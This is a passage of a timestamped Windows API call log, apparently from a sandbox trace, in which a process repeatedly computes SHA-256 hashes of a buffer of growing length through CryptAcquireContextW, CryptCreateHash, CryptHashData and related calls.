	[0191.317] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23000a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23000a0, pdwDataLen=0x1283b0) returned 1
	[0191.317] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.317] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.317] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.317] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.317] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0191.317] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.317] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23000c8
	[0191.317] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23000c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23000c8, pdwDataLen=0x1283b0) returned 1
	[0191.317] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.317] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.317] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.318] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.318] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0191.318] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.318] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23000f0
	[0191.318] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23000f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23000f0, pdwDataLen=0x1283b0) returned 1
	[0191.318] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.318] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.318] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.318] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.318] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0191.318] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.318] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300118
	[0191.318] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300118, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300118, pdwDataLen=0x1283b0) returned 1
	[0191.318] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.318] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.318] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.319] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.319] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0191.319] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.320] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300140
	[0191.320] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300140, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300140, pdwDataLen=0x1283b0) returned 1
	[0191.320] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.320] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.320] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.320] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.320] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0191.320] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.320] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300168
	[0191.320] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300168, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300168, pdwDataLen=0x1283b0) returned 1
	[0191.320] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.320] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.320] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.321] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.321] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0191.321] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.321] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300190
	[0191.321] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300190, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300190, pdwDataLen=0x1283b0) returned 1
	[0191.321] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.321] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.321] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.321] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.321] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0191.321] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.321] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23001b8
	[0191.321] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23001b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23001b8, pdwDataLen=0x1283b0) returned 1
	[0191.321] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.321] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.321] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.322] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.322] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0191.322] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.322] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23001e0
	[0191.322] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23001e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23001e0, pdwDataLen=0x1283b0) returned 1
	[0191.322] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.322] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.322] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.322] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.322] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0191.322] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.322] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300208
	[0191.322] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300208, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300208, pdwDataLen=0x1283b0) returned 1
	[0191.322] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.322] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.322] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.323] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.323] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0191.323] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.323] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300230
	[0191.323] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300230, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300230, pdwDataLen=0x1283b0) returned 1
	[0191.323] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.323] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.323] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.323] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.323] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0191.323] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.323] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300258
	[0191.323] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300258, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300258, pdwDataLen=0x1283b0) returned 1
	[0191.323] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.323] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.323] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.324] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.324] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0191.324] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.324] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300280
	[0191.324] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300280, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300280, pdwDataLen=0x1283b0) returned 1
	[0191.324] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.324] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.324] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.324] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.324] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0191.324] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.324] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23002a8
	[0191.324] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23002a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23002a8, pdwDataLen=0x1283b0) returned 1
	[0191.324] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.324] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.325] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.325] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.325] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0191.325] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.325] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23002d0
	[0191.325] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23002d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23002d0, pdwDataLen=0x1283b0) returned 1
	[0191.325] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.325] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.325] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.325] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.325] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0191.326] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.326] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23002f8
	[0191.326] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23002f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23002f8, pdwDataLen=0x1283b0) returned 1
	[0191.326] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.326] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.326] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.326] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.326] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0191.326] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.326] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300320
	[0191.326] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300320, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300320, pdwDataLen=0x1283b0) returned 1
	[0191.326] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.326] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.326] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.327] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.327] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0191.327] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.327] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300348
	[0191.327] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300348, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300348, pdwDataLen=0x1283b0) returned 1
	[0191.327] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.327] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.327] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.327] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.327] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0191.327] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.327] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300370
	[0191.327] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300370, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300370, pdwDataLen=0x1283b0) returned 1
	[0191.327] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.327] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.327] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.328] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.328] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0191.328] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.328] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300398
	[0191.328] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300398, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300398, pdwDataLen=0x1283b0) returned 1
	[0191.328] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.328] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.328] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.328] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.328] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0191.328] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.328] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23003c0
	[0191.328] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23003c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23003c0, pdwDataLen=0x1283b0) returned 1
	[0191.328] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.328] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.328] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.329] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.329] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0191.329] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.329] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23003e8
	[0191.329] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23003e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23003e8, pdwDataLen=0x1283b0) returned 1
	[0191.329] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.329] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.329] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.329] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.329] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0191.329] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.329] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300410
	[0191.329] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300410, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300410, pdwDataLen=0x1283b0) returned 1
	[0191.329] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.329] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.329] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.330] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.330] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0191.330] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.330] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300438
	[0191.330] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300438, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300438, pdwDataLen=0x1283b0) returned 1
	[0191.330] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.330] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.330] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.330] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.330] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0191.330] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.330] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300460
	[0191.330] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300460, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300460, pdwDataLen=0x1283b0) returned 1
	[0191.331] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.331] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.331] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.331] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.331] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0191.331] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.331] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300488
	[0191.331] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300488, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300488, pdwDataLen=0x1283b0) returned 1
	[0191.331] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.331] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
